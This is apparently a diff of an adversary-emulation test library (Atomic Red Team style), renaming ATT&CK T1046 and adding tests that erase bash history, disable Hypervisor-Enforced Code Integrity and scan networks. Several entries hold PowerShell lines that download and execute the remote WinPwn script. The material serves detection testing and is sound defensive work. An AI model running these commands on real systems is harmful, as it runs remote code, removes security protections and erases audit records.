+          2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard"
+          /v "Locked" 2> nul | findstr Locked 2> nul") -and (cmd.exe /c "reg query
+          "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity"
+          /v "Enabled" 2> nul | findstr Enabled 2> nul") -and (cmd.exe /c "reg query
+          "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity"
+          /v "Locked" 2> nul | findstr Locked 2> nul"))) { exit 0 } else { exit 1
+          }
+
+          '
+        get_prereq_command: |
+          reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /t REG_DWORD /d 1 /f
+          reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" /t REG_DWORD /d 1 /f
+          reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Locked" /t REG_DWORD /d 0 /f
+          reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" /t REG_DWORD /d 1 /f
+          reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" /t REG_DWORD /d 0 /f
+      executor:
+        command: 'reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity"
+          /v "Enabled" /t REG_DWORD /d 0 /f
+
+          '
+        cleanup_command: |
+          reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /f
+          reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" /f
+          reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Locked" /f
+          reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" /f
+          reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" /f
+        name: powershell
+        elevation_required: true
  T1601:
    technique:
      x_mitre_platforms:
@@ -91921,7 +92076,7 @@ discovery:
        macOS APT Activity Bradley)"
      modified: '2022-04-20T16:05:30.960Z'
      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Network Service Scanning
+      name: Network Service Discovery
      x_mitre_detection: |-
        System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.

@@ -92123,6 +92278,43 @@ discovery:
          iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
          fruit -noninteractive -consoleoutput
        name: powershell
+    - name: Network Service Discovery for Containers
+      auto_generated_guid: 06eaafdb-8982-426e-8a31-d572da633caa
+      description: Attackers may try to obtain a list of services that are operating
+        on remote hosts and local network infrastructure devices, in order to identify
+        potential vulnerabilities that can be exploited through remote software attacks.
+        They typically use tools to conduct port and vulnerability scans in order
+        to obtain this information.
+      supported_platforms:
+      - containers
+      dependency_executor_name: sh
+      dependencies:
+      - description: Verify docker is installed.
+        prereq_command: 'which docker
+
+          '
+        get_prereq_command: 'if [ "" == "`which docker`" ]; then echo "Docker Not
+          Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker
+          ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else
+          echo "Docker installed"; fi
+
+          '
+      - description: Verify docker service is running.
+        prereq_command: 'sudo systemctl status docker  --no-pager
+
+          '
+        get_prereq_command: 'sudo systemctl start docker
+
+          '
+      executor:
+        command: |-
+          docker build -t t1046 /root/AtomicRedTeam/atomics/T1046/src/
+          docker run --name t1046_container  -d -t t1046
+          docker exec t1046_container ./test.sh
+        cleanup_command: |-
+          docker stop t1046_container
+          docker rmi -f t1046
+        name: sh
  T1518:
    technique:
      x_mitre_platforms:
@@ -10438,6 +10438,115 @@ defense-evasion:
          3. ls
          4. whoami > recon.txt
        name: manual
+    - name: Clear bash history
+      auto_generated_guid: 878794f7-c511-4199-a950-8c28b3ed8e5b
+      description: "An attacker may clear the bash history cache and the history file
+        as their last act before logging off to remove the record of their command
+        line activities. \n\nIn this test we use the $HISTFILE variable throughout
+        to 1. confirms the $HISTFILE variable is set 2. echo \"\" into it 3..5 confirm
+        the file is empty 6 clear the history cache 7. confirm the history cache is
+        empty. This is when the attacker would logoff.\n"
+      supported_platforms:
+      - linux
+      executor:
+        name: bash
+        elevation_required: false
+        command: "cp $HISTFILE $HISTFILE.OLD\nif ((${#HISTFILE[@]})); then echo $HISTFILE;
+          fi\necho \"\" > $HISTFILE\nif [ $(wc -c <$HISTFILE) -gt 1 ]; then echo \"$HISTFILE
+          is larger than 1k\"; fi\nls -la $HISTFILE \ncat $HISTFILE\nhistory -c \nif
+          [ $(history |wc -l) -eq 1 ]; then echo \"History cache cleared\"; fi\n"
+        cleanup_command: "mv -f $HISTFILE.OLD $HISTFILE \n"
+    - name: Setting the HISTCONTROL environment variable
+      auto_generated_guid: 10ab786a-028e-4465-96f6-9e83ca6c5f24
+      description: "An attacker may exploit the space before a command (e.g. \" ls\")
+        or the duplicate command suppression feature in Bash history to prevent their
+        commands from being recorded in the history file or to obscure the order of
+        commands used. \n\nIn this test we 1. sets $HISTCONTROL to ignoreboth 2. clears
+        the history cache 3. executes ls -la with a space in-front of it 4. confirms
+        that ls -la is not in the history cache 5. sets $HISTCONTROL to erasedups
+        6. clears the history cache 7..9 executes ls -la $HISTFILE 3 times 10. confirms
+        that their is only one command in history\n"
+      supported_platforms:
+      - linux
+      executor:
+        name: bash
+        elevation_required: false
+        command: "TEST=$(echo $HISTCONTROL)\nif [ \"$HISTCONTROL\" != \"ignoreboth\"
+          ]; then export HISTCONTROL=\"ignoreboth\"; fi\nhistory -c \nls -la $HISTFILE
+          # \" ls -la $HISTFILE\"\nif [ $(history |wc -l) -eq 1 ]; then echo \"ls
+          -la is not in history cache\"; fi\n# -> ls -la is not in history cache\nif
+          [ \"$HISTCONTROL\" != \"erasedups\" ]; then export HISTCONTROL=\"erasedups\";
+          fi\nhistory -c \nls -la $HISTFILE\nls -la $HISTFILE\nls -la $HISTFILE\nif
+          [ $(history |wc -l) -eq 2 ]; then echo \"Their is only one entry for ls
+          -la $HISTFILE\"; fi\n"
+        cleanup_command: 'export HISTCONTROL=$(echo $TEST)
+
+          '
+    - name: Setting the HISTFILESIZE environment variable
+      auto_generated_guid: 5cafd6c1-2f43-46eb-ac47-a5301ba0a618
+      description: |
+        An Adversary may set the bash history files size environment variable (HISTFILESIZE) to zero to prevent the logging of commands to the history file after they log out of the system.
+
+        Note: we don't wish to log out, so we are just confirming the value of HISTFILESIZE. In this test we 1. echo HISTFILESIZE 2. set it to zero 3. confirm that HISTFILESIZE is set to zero.
+      supported_platforms:
+      - linux
+      executor:
+        name: bash
+        elevation_required: false
+        command: |
+          TEST=$(echo $HISTFILESIZE)
+          echo $HISTFILESIZE
+          export HISTFILESIZE=0
+          if [ $(echo $HISTFILESIZE) -eq 0 ]; then echo "\$HISTFILESIZE is zero"; fi
+          # -> $HISTFILESIZE is zero
+        cleanup_command: 'export HISTCONTROL=$(echo $TEST)
+
+          '
+    - name: Setting the HISTFILE environment variable
+      auto_generated_guid: b3dacb6c-a9e3-44ec-bf87-38db60c5cad1
+      description: |
+        An Adversary may clear, unset or redirect the history environment variable HISTFILE to prevent logging of commands to the history file after they log out of the system.
+
+        Note: we don't wish to log out, so we are just confirming the value of HISTFILE. In this test we 1. echo HISTFILE 2. set it to /dev/null 3. confirm that HISTFILE is set to /dev/null.
+      supported_platforms:
+      - linux
+      executor:
+        name: bash
+        elevation_required: false
+        command: |
+          TEST=$(echo $HISTFILE)
+          echo $HISTFILE
+          export HISTFILE="/dev/null"
+          if [ $(echo $HISTFILE) == "/dev/null" ]; then echo "\$HISTFILE is /dev/null"; fi
+          # -> $HISTFILE is /dev/null
+        cleanup_command: 'export HISTFILE=$(echo $TEST)
+
+          '
+    - name: Setting the HISTIGNORE environment variable
+      auto_generated_guid: f12acddb-7502-4ce6-a146-5b62c59592f1
+      description: "An Adversary may take advantage of the HISTIGNORE environment
+        variable either to ignore particular commands or all commands. \n\nIn this
+        test we 1. set HISTIGNORE to ignore ls, rm and ssh commands 2. clear this
+        history cache 3..4 execute ls commands 5. confirm that the ls commands are
+        not in the history cache 6. unset HISTIGNORE variable 7.. same again, but
+        ignoring ALL commands.\n"
+      supported_platforms:
+      - linux
+      executor:
+        name: bash
+        elevation_required: false
+        command: "if ((${#HISTIGNORE[@]})); then echo \"\\$HISTIGNORE = $HISTIGNORE\";
+          else export HISTIGNORE='ls*:rm*:ssh*'; echo \"\\$HISTIGNORE = $HISTIGNORE\";
+          fi\n# -> $HISTIGNORE = ls*:rm*:ssh*\nhistory -c \nls -la $HISTFILE\nls -la
+          ~/.bash_logout\nif [ $(history |wc -l) -eq 1 ]; then echo \"ls commands
+          are not in history\"; fi\n# -> ls commands are not in history\nunset HISTIGNORE\n\nif
+          ((${#HISTIGNORE[@]})); then echo \"\\$HISTIGNORE = $HISTIGNORE\"; else export
+          HISTIGNORE='*'; echo \"\\$HISTIGNORE = $HISTIGNORE\"; fi\n# -> $HISTIGNORE
+          = *\nhistory -c \nwhoami\ngroups\nif [ $(history |wc -l) -eq 0 ]; then echo
+          \"History cache is empty\"; fi\n# -> History cache is empty\n"
+        cleanup_command: 'unset HISTIGNORE
+
+          '
  T1497.002:
    technique:
      x_mitre_platforms:
@@ -60175,7 +60284,7 @@ discovery:
        macOS APT Activity Bradley)"
      modified: '2022-04-20T16:05:30.960Z'
      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Network Service Scanning
+      name: Network Service Discovery
      x_mitre_detection: |-
        System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.

@@ -57471,7 +57471,7 @@ discovery:
        macOS APT Activity Bradley)"
      modified: '2022-04-20T16:05:30.960Z'
      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Network Service Scanning
+      name: Network Service Discovery
      x_mitre_detection: |-
        System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.

@@ -52615,7 +52615,7 @@ discovery:
        macOS APT Activity Bradley)"
      modified: '2022-04-20T16:05:30.960Z'
      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Network Service Scanning
+      name: Network Service Discovery
      x_mitre_detection: |-
        System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.

@@ -52482,7 +52482,7 @@ discovery:
        macOS APT Activity Bradley)"
      modified: '2022-04-20T16:05:30.960Z'
      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Network Service Scanning
+      name: Network Service Discovery
      x_mitre_detection: |-
        System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.

@@ -16389,6 +16389,52 @@ defense-evasion:
          schtasks /create /xml "%temp%\Windows_Defender_Cache_Maintenance.xml" /tn "\Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
        name: command_prompt
        elevation_required: true
+    - name: Disable Hypervisor-Enforced Code Integrity (HVCI)
+      auto_generated_guid: 70bd71e6-eba4-4e00-92f7-617911dbe020
+      description: "This test disables Hypervisor-Enforced Code Integrity (HVCI) by
+        setting the registry key HKLM:\\SYSTEM\\CurrentControlSet\\Control\\DeviceGuard\\Scenarios\\HypervisorEnforcedCodeIntegrity
+        \"Enabled\" value to \"0\".\nThe pre-req needs to be ran in order to setup
+        HVCI and have it enabled. \nWe do not recommend running this in production.\n[Black
+        Lotus Campaign](https://www.microsoft.com/en-us/security/blog/2023/04/11/guidance-for-investigating-attacks-using-cve-2022-21894-the-blacklotus-campaign/)\n[Microsoft](https://learn.microsoft.com/en-us/windows/security/threat-protection/device-guard/enable-virtualization-based-protection-of-code-integrity)\n"
+      supported_platforms:
+      - windows
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'HVCI must be enabled
+
+          '
+        prereq_command: 'if (((cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard"
+          /v "EnableVirtualizationBasedSecurity" 2> nul | findstr EnableVirtualizationBasedSecurity
+          2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard"
+          /v "RequirePlatformSecurityFeatures" 2> nul | findstr RequirePlatformSecurityFeatures
+          2> nul") -and (cmd.exe /c "reg query "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard"
+          /v "Locked" 2> nul | findstr Locked 2> nul") -and (cmd.exe /c "reg query
+          "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity"
+          /v "Enabled" 2> nul | findstr Enabled 2> nul") -and (cmd.exe /c "reg query
+          "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity"
+          /v "Locked" 2> nul | findstr Locked 2> nul"))) { exit 0 } else { exit 1
+          }
+
+          '
+        get_prereq_command: |
+          reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /t REG_DWORD /d 1 /f
+          reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" /t REG_DWORD /d 1 /f
+          reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Locked" /t REG_DWORD /d 0 /f
+          reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" /t REG_DWORD /d 1 /f
+          reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" /t REG_DWORD /d 0 /f
+      executor:
+        command: 'reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity"
+          /v "Enabled" /t REG_DWORD /d 0 /f
+
+          '
+        cleanup_command: |
+          reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /f
+          reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "RequirePlatformSecurityFeatures" /f
+          reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard" /v "Locked" /f
+          reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" /f
+          reg delete "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Locked" /f
+        name: powershell
+        elevation_required: true
  T1601:
    technique:
      x_mitre_platforms:
@@ -79083,7 +79129,7 @@ discovery:
        macOS APT Activity Bradley)"
      modified: '2022-04-20T16:05:30.960Z'
      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      name: Network Service Scanning
+      name: Network Service Discovery
      x_mitre_detection: |-
        System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.

@@ -1,4 +1,4 @@
-# T1046 - Network Service Scanning
+# T1046 - Network Service Discovery
 ## [Description from ATT&CK](https://attack.mitre.org/techniques/T1046)
 <blockquote>Adversaries may attempt to get a listing of services running on remote hosts and local network infrastructure devices, including those that may be vulnerable to remote software exploitation. Common methods to acquire this information include port and/or vulnerability scans using tools that are brought onto a system.(Citation: CISA AR21-126A FIVEHANDS May 2021)   

@@ -24,6 +24,8 @@ Within macOS environments, adversaries may use the native Bonjour application to

 - [Atomic Test #8 - WinPwn - fruit](#atomic-test-8---winpwn---fruit)

+- [Atomic Test #9 - Network Service Discovery for Containers](#atomic-test-9---network-service-discovery-for-containers)
+

 <br/>

@@ -341,4 +343,60 @@ fruit -noninteractive -consoleoutput



+<br/>
+<br/>
+
+## Atomic Test #9 - Network Service Discovery for Containers
+Attackers may try to obtain a list of services that are operating on remote hosts and local network infrastructure devices, in order to identify potential vulnerabilities that can be exploited through remote software attacks. They typically use tools to conduct port and vulnerability scans in order to obtain this information.
+
+**Supported Platforms:** Containers
+
+
+**auto_generated_guid:** 06eaafdb-8982-426e-8a31-d572da633caa
+
+
+
+
+
+
+#### Attack Commands: Run with `sh`! 
+
+
+```sh
+docker build -t t1046 /root/AtomicRedTeam/atomics/T1046/src/
+docker run --name t1046_container  -d -t t1046
+docker exec t1046_container ./test.sh
+```
+
+#### Cleanup Commands:
+```sh
+docker stop t1046_container
+docker rmi -f t1046
+```
+
+
+
+#### Dependencies:  Run with `sh`!
+##### Description: Verify docker is installed.
+##### Check Prereq Commands:
+```sh
+which docker
+```
+##### Get Prereq Commands:
+```sh
+if [ "" == "`which docker`" ]; then echo "Docker Not Found"; if [ -n "`which apt-get`" ]; then sudo apt-get -y install docker ; elif [ -n "`which yum`" ]; then sudo yum -y install docker ; fi ; else echo "Docker installed"; fi
+```
+##### Description: Verify docker service is running.
+##### Check Prereq Commands:
+```sh
+sudo systemctl status docker  --no-pager
+```
+##### Get Prereq Commands:
+```sh
+sudo systemctl start docker
+```
+
+
+
+
 <br/>
@@ -1,168 +1,195 @@
-attack_technique: T1046
-display_name: Network Service Scanning
-atomic_tests:
- name: Port Scan
-  auto_generated_guid: 68e907da-2539-48f6-9fc9-257a78c05540
-  description: |
-    Scan ports to check for listening ports.
-
-    Upon successful execution, sh will perform a network connection against a single host (192.168.1.1) and determine what ports are open in the range of 1-65535. Results will be via stdout.
-  supported_platforms:
-  - linux
-  - macos
-  input_arguments:
-    host:
-      description: Host to scan.
-      type: string
-      default: 192.168.1.1
-  executor:
-    command: |
-      for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
-    name: bash
- name: Port Scan Nmap
-  auto_generated_guid: 515942b0-a09f-4163-a7bb-22fefb6f185f
-  description: |
-    Scan ports to check for listening ports with Nmap.
-
-    Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of adresseses on port 80 to determine if listening. Results will be via stdout.
-  supported_platforms:
-  - linux
-  - macos
-  input_arguments:
-    host:
-      description: Host to scan.
-      type: string
-      default: 192.168.1.1
-    port:
-      description: Ports to scan.
-      type: string
-      default: "80"
-    network_range:
-      description: Network Range to Scan.
-      type: string
-      default: 192.168.1.0/24
-  dependency_executor_name: sh
-  dependencies:
-  - description: |
-      Check if nmap command exists on the machine
-    prereq_command: |
-      if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi;
-    get_prereq_command: |
-      (which yum && yum -y install epel-release nmap)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)
-  - description: |
-      Check if nc command exists on the machine
-    prereq_command: |
-      if [ -x "$(command -v nc)" ]; then exit 0; else exit 1; fi;
-    get_prereq_command: |
-      (which yum && yum -y install epel-release nc)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y netcat)
-  - description: |
-      Check if telnet command exists on the machine
-    prereq_command: |
-      if [ -x "$(command -v telnet)" ]; then exit 0; else exit 1; fi;
-    get_prereq_command: |
-      (which yum && yum -y install epel-release telnet)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y telnet)
-  executor:
-    command: |
-      sudo nmap -sS #{network_range} -p #{port}
-      telnet #{host} #{port}
-      nc -nv #{host} #{port}
-    name: sh
-    elevation_required: true
- name: Port Scan NMap for Windows
-  auto_generated_guid: d696a3cb-d7a8-4976-8eb5-5af4abf2e3df
-  description: Scan ports to check for listening ports for the local host 127.0.0.1
-  supported_platforms:
-  - windows
-  input_arguments:
-    nmap_url:
-      description: NMap installer download URL
-      type: url
-      default: https://nmap.org/dist/nmap-7.80-setup.exe
-    host_to_scan:
-      description: The host to scan with NMap
-      type: string
-      default: 127.0.0.1
-  dependency_executor_name: powershell
-  dependencies:
-  - description: |
-      NMap must be installed
-    prereq_command: 'if (cmd /c "nmap 2>nul") {exit 0} else {exit 1}'
-    get_prereq_command: |
-      Invoke-WebRequest -OutFile $env:temp\nmap-7.80-setup.exe #{nmap_url}
-      Start-Process $env:temp\nmap-7.80-setup.exe /S
-  executor:
-    command: |-
-      nmap #{host_to_scan}
-    name: powershell
-    elevation_required: true
- name: Port Scan using python
-  auto_generated_guid: 6ca45b04-9f15-4424-b9d3-84a217285a5c
-  description: |
-    Scan ports to check for listening ports with python
-  supported_platforms:
-  - windows
-  input_arguments:
-    host_ip:
-      description: Host to scan.
-      type: string
-      default: 127.0.0.1
-    filename:
-      description: Location of the project file
-      type: path
-      default: PathToAtomicsFolder\T1046\src\T1046.py
-  dependency_executor_name: powershell
-  dependencies:
-  - description: |
-      Check if python exists on the machine
-    prereq_command: |
-      if (python --version) {exit 0} else {exit 1}
-    get_prereq_command: |
-      echo "Python 3 must be installed manually"
-  executor:
-    command: |
-      python #{filename} -i #{host_ip}
-    name: powershell
- name: WinPwn - spoolvulnscan
-  auto_generated_guid: 54574908-f1de-4356-9021-8053dd57439a
-  description: Start MS-RPRN RPC Service Scan using spoolvulnscan function of WinPwn
-  supported_platforms:
-  - windows
-  executor:
-    command: |-
-      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
-      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
-      spoolvulnscan -noninteractive -consoleoutput
-    name: powershell
- name: WinPwn - MS17-10
-  auto_generated_guid: 97585b04-5be2-40e9-8c31-82157b8af2d6
-  description: Search for MS17-10 vulnerable Windows Servers in the domain using powerSQL function of WinPwn
-  supported_platforms:
-  - windows
-  executor:
-    command: |-
-      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
-      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
-      MS17-10 -noninteractive -consoleoutput
-    name: powershell
- name: WinPwn - bluekeep
-  auto_generated_guid: 1cca5640-32a9-46e6-b8e0-fabbe2384a73
-  description: Search for bluekeep vulnerable Windows Systems in the domain using bluekeep function of WinPwn. Can take many minutes to complete (~600 seconds in testing on a small domain).
-  supported_platforms:
-  - windows
-  executor:
-    command: |-
-      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
-      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
-      bluekeep -noninteractive -consoleoutput
-    name: powershell
- name: WinPwn - fruit
-  auto_generated_guid: bb037826-cbe8-4a41-93ea-b94059d6bb98
-  description: Search for potentially vulnerable web apps (low hanging fruits) using fruit function of WinPwn
-  supported_platforms:
-  - windows
-  executor:
-    command: |-
-      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
-      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
-      fruit -noninteractive -consoleoutput
-    name: powershell
+attack_technique: T1046
+display_name: Network Service Discovery
+atomic_tests:
+- name: Port Scan
+  auto_generated_guid: 68e907da-2539-48f6-9fc9-257a78c05540
+  description: |
+    Scan ports to check for listening ports.
+
+    Upon successful execution, sh will perform a network connection against a single host (192.168.1.1) and determine what ports are open in the range of 1-65535. Results will be via stdout.
+  supported_platforms:
+  - linux
+  - macos
+  input_arguments:
+    host:
+      description: Host to scan.
+      type: string
+      default: 192.168.1.1
+  executor:
+    command: |
+      for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
+    name: bash
+- name: Port Scan Nmap
+  auto_generated_guid: 515942b0-a09f-4163-a7bb-22fefb6f185f
+  description: |
+    Scan ports to check for listening ports with Nmap.
+
+    Upon successful execution, sh will utilize nmap, telnet, and nc to contact a single or range of adresseses on port 80 to determine if listening. Results will be via stdout.
+  supported_platforms:
+  - linux
+  - macos
+  input_arguments:
+    host:
+      description: Host to scan.
+      type: string
+      default: 192.168.1.1
+    port:
+      description: Ports to scan.
+      type: string
+      default: "80"
+    network_range:
+      description: Network Range to Scan.
+      type: string
+      default: 192.168.1.0/24
+  dependency_executor_name: sh
+  dependencies:
+  - description: |
+      Check if nmap command exists on the machine
+    prereq_command: |
+      if [ -x "$(command -v nmap)" ]; then exit 0; else exit 1; fi;
+    get_prereq_command: |
+      (which yum && yum -y install epel-release nmap)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y nmap)
+  - description: |
+      Check if nc command exists on the machine
+    prereq_command: |
+      if [ -x "$(command -v nc)" ]; then exit 0; else exit 1; fi;
+    get_prereq_command: |
+      (which yum && yum -y install epel-release nc)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y netcat)
+  - description: |
+      Check if telnet command exists on the machine
+    prereq_command: |
+      if [ -x "$(command -v telnet)" ]; then exit 0; else exit 1; fi;
+    get_prereq_command: |
+      (which yum && yum -y install epel-release telnet)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y telnet)
+  executor:
+    command: |
+      sudo nmap -sS #{network_range} -p #{port}
+      telnet #{host} #{port}
+      nc -nv #{host} #{port}
+    name: sh
+    elevation_required: true
+- name: Port Scan NMap for Windows
+  auto_generated_guid: d696a3cb-d7a8-4976-8eb5-5af4abf2e3df
+  description: Scan ports to check for listening ports for the local host 127.0.0.1
+  supported_platforms:
+  - windows
+  input_arguments:
+    nmap_url:
+      description: NMap installer download URL
+      type: url
+      default: https://nmap.org/dist/nmap-7.80-setup.exe
+    host_to_scan:
+      description: The host to scan with NMap
+      type: string
+      default: 127.0.0.1
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      NMap must be installed
+    prereq_command: 'if (cmd /c "nmap 2>nul") {exit 0} else {exit 1}'
+    get_prereq_command: |
+      Invoke-WebRequest -OutFile $env:temp\nmap-7.80-setup.exe #{nmap_url}
+      Start-Process $env:temp\nmap-7.80-setup.exe /S
+  executor:
+    command: |-
+      nmap #{host_to_scan}
+    name: powershell
+    elevation_required: true
+- name: Port Scan using python
+  auto_generated_guid: 6ca45b04-9f15-4424-b9d3-84a217285a5c
+  description: |
+    Scan ports to check for listening ports with python
+  supported_platforms:
+  - windows
+  input_arguments:
+    host_ip:
+      description: Host to scan.
+      type: string
+      default: 127.0.0.1
+    filename:
+      description: Location of the project file
+      type: path
+      default: PathToAtomicsFolder\T1046\src\T1046.py
+  dependency_executor_name: powershell
+  dependencies:
+  - description: |
+      Check if python exists on the machine
+    prereq_command: |
+      if (python --version) {exit 0} else {exit 1}
+    get_prereq_command: |
+      echo "Python 3 must be installed manually"
+  executor:
+    command: |
+      python #{filename} -i #{host_ip}
+    name: powershell
+- name: WinPwn - spoolvulnscan
+  auto_generated_guid: 54574908-f1de-4356-9021-8053dd57439a
+  description: Start MS-RPRN RPC Service Scan using spoolvulnscan function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+      spoolvulnscan -noninteractive -consoleoutput
+    name: powershell
+- name: WinPwn - MS17-10
+  auto_generated_guid: 97585b04-5be2-40e9-8c31-82157b8af2d6
+  description: Search for MS17-10 vulnerable Windows Servers in the domain using powerSQL function of WinPwn
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+      MS17-10 -noninteractive -consoleoutput
+    name: powershell
+- name: WinPwn - bluekeep
+  auto_generated_guid: 1cca5640-32a9-46e6-b8e0-fabbe2384a73
+  description: Search for bluekeep vulnerable Windows Systems in the domain using bluekeep function of WinPwn. Can take many minutes to complete (~600 seconds in testing on a small domain).
+  supported_platforms:
+  - windows
+  executor:
+    command: |-
+      $S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
+      iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
+      bluekeep -noninteractive -consoleoutput
+    name: powershell
+- name: WinPwn - fruit
